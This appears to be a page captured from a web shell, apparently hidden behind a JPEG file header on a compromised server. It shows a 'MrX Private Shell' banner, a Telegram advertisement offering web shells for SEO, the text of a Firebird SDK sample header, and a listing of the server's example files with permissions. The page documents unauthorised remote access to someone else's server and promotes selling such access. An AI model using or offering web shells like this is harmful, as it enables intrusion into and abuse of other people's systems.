����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* * PROGRAM: Object oriented API samples. * MODULE: ifaceExamples.h * DESCRIPTION: A number of common defines for all samples. * * The contents of this file are subject to the Initial * Developer's Public License Version 1.0 (the "License"); * you may not use this file except in compliance with the * License. You may obtain a copy of the License at * http://www.ibphoenix.com/main.nfs?a=ibphoenix&page=ibp_idpl. * * Software distributed under the License is distributed AS IS, * WITHOUT WARRANTY OF ANY KIND, either express or implied. * See the License for the specific language governing rights * and limitations under the License. * * The Original Code was created by Alexander Peshkoff * for the Firebird Open Source RDBMS project. * * Copyright (c) 2014 Alexander Peshkoff <peshkoff@mail.ru> * and all contributors signed below. * * All Rights Reserved. * Contributor(s): ______________________________________. */ #include <stdlib.h> #include <stdio.h> #include <string.h> #if defined(__cplusplus) && (__cplusplus >= 201103L) #include <atomic> typedef std::atomic_int FbSampleAtomic; #else typedef int FbSampleAtomic; #endif #include <firebird/Interface.h> using namespace Firebird; #define SAMPLES_DIALECT SQL_DIALECT_V6
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 01.create.cpp | File | 4.53 KB | 0644 |
|
| 01.create.pas | File | 4.38 KB | 0644 |
|
| 02.update.cpp | File | 5.59 KB | 0644 |
|
| 03.select.cpp | File | 5.34 KB | 0644 |
|
| 04.print_table.cpp | File | 6.04 KB | 0644 |
|
| 05.user_metadata.cpp | File | 6.52 KB | 0644 |
|
| 06.fb_message.cpp | File | 4.27 KB | 0644 |
|
| 07.blob.cpp | File | 4.96 KB | 0644 |
|
| 08.events.cpp | File | 4.35 KB | 0644 |
|
| 09.service.cpp | File | 4.98 KB | 0644 |
|
| 10.backup.cpp | File | 4.66 KB | 0644 |
|
| 11.batch.cpp | File | 15.69 KB | 0644 |
|
| 12.batch_isc.cpp | File | 8.28 KB | 0644 |
|
| 13.null_pk.cpp | File | 3.9 KB | 0644 |
|
| 14.restore.cpp | File | 4.32 KB | 0644 |
|
| ifaceExamples.h | File | 1.25 KB | 0644 |
|